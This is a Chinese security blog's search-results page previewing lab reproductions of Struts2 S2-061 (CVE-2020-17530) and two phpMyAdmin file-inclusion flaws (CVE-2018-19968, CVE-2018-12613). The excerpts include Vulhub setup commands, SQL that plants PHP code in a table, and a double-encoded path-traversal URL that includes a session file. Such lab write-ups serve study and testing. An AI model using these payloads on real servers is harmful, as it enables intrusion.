TypechoJoeTheme

K.Fire's Blog

K.Fire

没有勇敢的工作
只有困难的打工人
网站页面
搜索到 4 篇与 CVE 的结果
2020-12-15

Struts2 S2-061漏洞复现(CVE-2020-17530)

Struts2 S2-061漏洞复现(CVE-2020-17530)
漏洞概述Struts2 会对某些标签属性(比如 id,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。影响范围Struts 2.0.0 - Struts 2.5.25靶机搭建Vulhub已上线docker部署git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/struts2/s2-061 docker-compose -version复现实际上发现 S2-061 的环境就是 S2-059的。<html> <head> <title>S2-059 demo</title> </head> <body> <a id="" href="/index.action">your input id: <br>has...
K.Fire
2020-12-15

笔记

244 阅读
0 评论
2020年12月15日
244 阅读
0 评论
2020-04-26

(CVE-2018-19968) phpmyadmin 文件包含复现

(CVE-2018-19968) phpmyadmin 文件包含复现
由于转换功能中出错,攻击者可以利用 phpMyAdmin 在 4.8.4 之前泄漏本地文件的内容。攻击者必须有权访问 phpMyAdmin 配置存储表,尽管这些表可以很容易地在攻击者有权访问的任何数据库中创建。攻击者必须具有有效的凭据才能登录到 phpMyAdmin;但是,攻击者必须拥有有效的凭据。此漏洞不允许攻击者绕过登录系统。影响版本phpmyadmin 4.8.0~4.8.3复现环境phpstudyphpMyAdmin4.8.1复现过程创建数据库,写入sessionCREATE DATABASE foo; CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY ); INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>'; 生成配置表http://192.168.2.1/phpmyadmin481/chk_rel.php?fixall_pmadb=1&db=foo 篡改pma_columninfo表INSERT INTO pma__column_info SELEC...
K.Fire
2020-04-26

分享

180 阅读
0 评论
2020年04月26日
180 阅读
0 评论
2020-04-26

(CVE-2018-12613) phpmyadmin 文件包含复现

(CVE-2018-12613) phpmyadmin 文件包含复现
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。影响版本phpMyAdmin 4.8.0/4.8.1复现环境phpstudyphpMyAdmin4.8.1复现过程session文件写入phpinfo如图,即在tmp文件夹session文件中插入了phpinfo代码。包含文件Payloadhttp://192.168.2.1/phpmyadmin481/index.php?target=db_sql.php%253f/../../../../../phpstudy/PHPTutorial/tmp/tmp/sess_5mk01jm6mpq5114m9hrk53g0qhnkrrcq 复现截图
K.Fire
2020-04-26

分享

46 阅读
0 评论
2020年04月26日
46 阅读
0 评论